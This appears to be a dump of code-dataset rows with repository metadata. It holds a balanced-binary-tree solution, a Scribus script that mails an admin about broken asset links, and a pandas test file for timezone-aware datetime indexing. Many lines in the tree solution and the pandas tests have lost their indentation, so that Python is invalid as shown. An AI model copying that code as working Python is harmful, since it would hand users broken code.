isbalanced, h = self.isBalancedandHeight(root)
return isbalanced
def isBalancedandHeight(self, root):
if root is None:
return True, 0
l, r = root.left, root.right
        l_balanced, l_h = self.isBalancedandHeight(l)
if not l_balanced:
return False, 0
r_balanced, r_h = self.isBalancedandHeight(r)
if not r_balanced:
return False, 0
if abs(l_h - r_h) < 2:
return True, max(l_h, r_h) + 1
return False, 0
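# A small runnable check of the solution above; TreeNode here just mirrors the
# definition quoted in the docstring at the top of this file.
class TreeNode:
    def __init__(self, val):
        self.val = val
        self.left, self.right = None, None

if __name__ == "__main__":
    # balanced: the heights of every pair of sibling subtrees differ by at most 1
    root = TreeNode(1)
    root.left, root.right = TreeNode(2), TreeNode(3)
    root.left.left = TreeNode(4)
    print(Solution().isBalanced(root))    # True
    # a left-only chain 1 -> 2 -> 3 is not balanced
    skewed = TreeNode(1)
    skewed.left = TreeNode(2)
    skewed.left.left = TreeNode(3)
    print(Solution().isBalanced(skewed))  # False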
|
scribusproject/scribus-tools
|
resource-checker/scribus-services-check.py
|
Python
|
gpl-3.0
| 408
| 0.009804
|
# This script will check http://services.scribus.net for broken assets
import lxml.html
url = "http://services.scribus.net"
doc = lxml.html.parse(url)
# pattern matching for relative urls: <a href="scribus_fonts.xml">
content_parsed = doc.xpath('//a/@href')  # collect the href attribute of every <a> element
# also ignore scribusversions.xml
# Create a scraper class to feed .xml page results to
# Create a function that mails an admin when a result 404s
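# A minimal sketch of the admin-notification idea noted above, assuming Python 3's
# urllib/smtplib and a local SMTP relay; ADMIN_EMAIL is a hypothetical address.
import smtplib
import urllib.error
import urllib.request
from email.message import EmailMessage

ADMIN_EMAIL = "[email protected]"  # hypothetical

def mail_admin_about_404s(asset_urls):
    """Fetch each asset URL and mail the admin a list of those that return 404."""
    broken = []
    for asset_url in asset_urls:
        try:
            urllib.request.urlopen(asset_url)
        except urllib.error.HTTPError as err:
            if err.code == 404:
                broken.append(asset_url)
    if broken:
        msg = EmailMessage()
        msg["Subject"] = "Broken assets on services.scribus.net"
        msg["From"] = ADMIN_EMAIL
        msg["To"] = ADMIN_EMAIL
        msg.set_content("\n".join(broken))
        with smtplib.SMTP("localhost") as smtp:
            smtp.send_message(msg)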
|
jreback/pandas
|
pandas/tests/indexing/test_datetime.py
|
Python
|
bsd-3-clause
| 7,714
| 0.001037
|
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Index, Series, Timestamp, date_range
import pandas._testing as tm
class TestDatetimeIndex:
def test_indexing_with_datetime_tz(self):
# GH#8260
# support datetime64 with tz
idx = Index(date_range("20130101", periods=3, tz="US/Eastern"), name="foo")
dr = date_range("20130110", periods=3)
df = DataFrame({"A": idx, "B": dr})
df["C"] = idx
df.iloc[1, 1] = pd.NaT
df.iloc[1, 2] = pd.NaT
# indexing
result = df.iloc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
result = df.loc[1]
expected = Series(
[Timestamp("2013-01-02 00:00:00-0500", tz="US/Eastern"), pd.NaT, pd.NaT],
index=list("ABC"),
dtype="object",
name=1,
)
tm.assert_series_equal(result, expected)
# indexing - fast_xs
df = DataFrame({"a": date_range("2014-01-01", periods=10, tz="UTC")})
result = df.iloc[5]
expected = Series(
[Timestamp("2014-01-06 00:00:00+0000", tz="UTC")], index=["a"], name=5
)
tm.assert_series_equal(result, expected)
result = df.loc[5]
tm.assert_series_equal(result, expected)
# indexing - boolean
result = df[df.a > df.a[3]]
expected = df.iloc[4:]
tm.assert_frame_equal(result, expected)
# indexing - setting an element
df = DataFrame(
data=pd.to_datetime(["2015-03-30 20:12:32", "2015-03-12 00:11:11"]),
columns=["time"],
)
df["new_col"] = ["new", "old"]
df.time = df.set_index("time").index.tz_localize("UTC")
v = df[df.new_col == "new"].set_index("time").index.tz_convert("US/Pacific")
# trying to set a single element on a part of a different timezone
# this converts to object
df2 = df.copy()
df2.loc[df2.new_col == "new", "time"] = v
expected = Series([v[0], df.loc[1, "time"]], name="time")
tm.assert_series_equal(df2.time, expected)
v = df.loc[df.new_col == "new", "time"] + pd.Timedelta("1s")
df.loc[df.new_col == "new", "time"] = v
tm.assert_series_equal(df.loc[df.new_col == "new", "time"], v)
def test_consistency_with_tz_aware_scalar(self):
        # xref gh-12938
# various ways of indexing the same tz-aware scalar
df = Series([Timestamp("2016-03-30 14:35:25", tz="Europe/Brussels")]).to_frame()
df = pd.concat([df, df]).reset_index(drop=True)
expected = Timestamp("2016-03-30 14:35:25+0200", tz="Europe/Brussels")
result = df[0][0]
assert result == expected
result = df.iloc[0, 0]
assert result == expected
result = df.loc[0, 0]
assert result == expected
result = df.iat[0, 0]
assert result == expected
result = df.at[0, 0]
assert result == expected
result = df[0].loc[0]
assert result == expected
result = df[0].at[0]
assert result == expected
def test_indexing_with_datetimeindex_tz(self):
# GH 12050
# indexing on a series with a datetimeindex with tz
index = date_range("2015-01-01", periods=2, tz="utc")
ser = Series(range(2), index=index, dtype="int64")
# list-like indexing
for sel in (index, list(index)):
# getitem
result = ser[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# setitem
result = ser.copy()
result[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
result = ser.loc[sel]
expected = ser.copy()
if sel is not index:
expected.index = expected.index._with_freq(None)
tm.assert_series_equal(result, expected)
# .loc setitem
result = ser.copy()
result.loc[sel] = 1
expected = Series(1, index=index)
tm.assert_series_equal(result, expected)
# single element indexing
# getitem
assert ser[index[1]] == 1
# setitem
result = ser.copy()
result[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
# .loc getitem
assert ser.loc[index[1]] == 1
# .loc setitem
result = ser.copy()
result.loc[index[1]] = 5
expected = Series([0, 5], index=index)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("to_period", [True, False])
def test_loc_getitem_listlike_of_datetimelike_keys(self, to_period):
# GH 11497
idx = date_range("2011-01-01", "2011-01-02", freq="D", name="idx")
if to_period:
idx = idx.to_period("D")
ser = Series([0.1, 0.2], index=idx, name="s")
keys = [Timestamp("2011-01-01"), Timestamp("2011-01-02")]
if to_period:
keys = [x.to_period("D") for x in keys]
result = ser.loc[keys]
exp = Series([0.1, 0.2], index=idx, name="s")
if not to_period:
exp.index = exp.index._with_freq(None)
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
            Timestamp("2011-01-02"),
            Timestamp("2011-01-02"),
Timestamp("2011-01-01"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
exp = Series(
[0.2, 0.2, 0.1], index=Index(keys, name="idx", dtype=idx.dtype), name="s"
)
result = ser.loc[keys]
tm.assert_series_equal(result, exp, check_index_type=True)
keys = [
Timestamp("2011-01-03"),
Timestamp("2011-01-02"),
Timestamp("2011-01-03"),
]
if to_period:
keys = [x.to_period("D") for x in keys]
with pytest.raises(KeyError, match="with any missing labels"):
ser.loc[keys]
def test_nanosecond_getitem_setitem_with_tz(self):
# GH 11679
data = ["2016-06-28 08:30:00.123456789"]
index = pd.DatetimeIndex(data, dtype="datetime64[ns, America/Chicago]")
df = DataFrame({"a": [10]}, index=index)
result = df.loc[df.index[0]]
expected = Series(10, index=["a"], name=df.index[0])
tm.assert_series_equal(result, expected)
result = df.copy()
result.loc[df.index[0], "a"] = -1
expected = DataFrame(-1, index=index, columns=["a"])
tm.assert_frame_equal(result, expected)
def test_loc_setitem_with_existing_dst(self):
# GH 18308
start = Timestamp("2017-10-29 00:00:00+0200", tz="Europe/Madrid")
end = Timestamp("2017-10-29 03:00:00+0100", tz="Europe/Madrid")
ts = Timestamp("2016-10-10 03:00:00", tz="Europe/Madrid")
idx = pd.date_range(start, end, closed="left", freq="H")
result = DataFrame(index=idx, columns=["value"])
result.loc[ts, "value"] = 12
expected = DataFrame(
[np.nan] * len(idx) + [12],
index=idx.append(pd.DatetimeIndex([ts])),
columns=["value"],
dtype=object,
)
tm.assert_frame_equal(result, expected)
|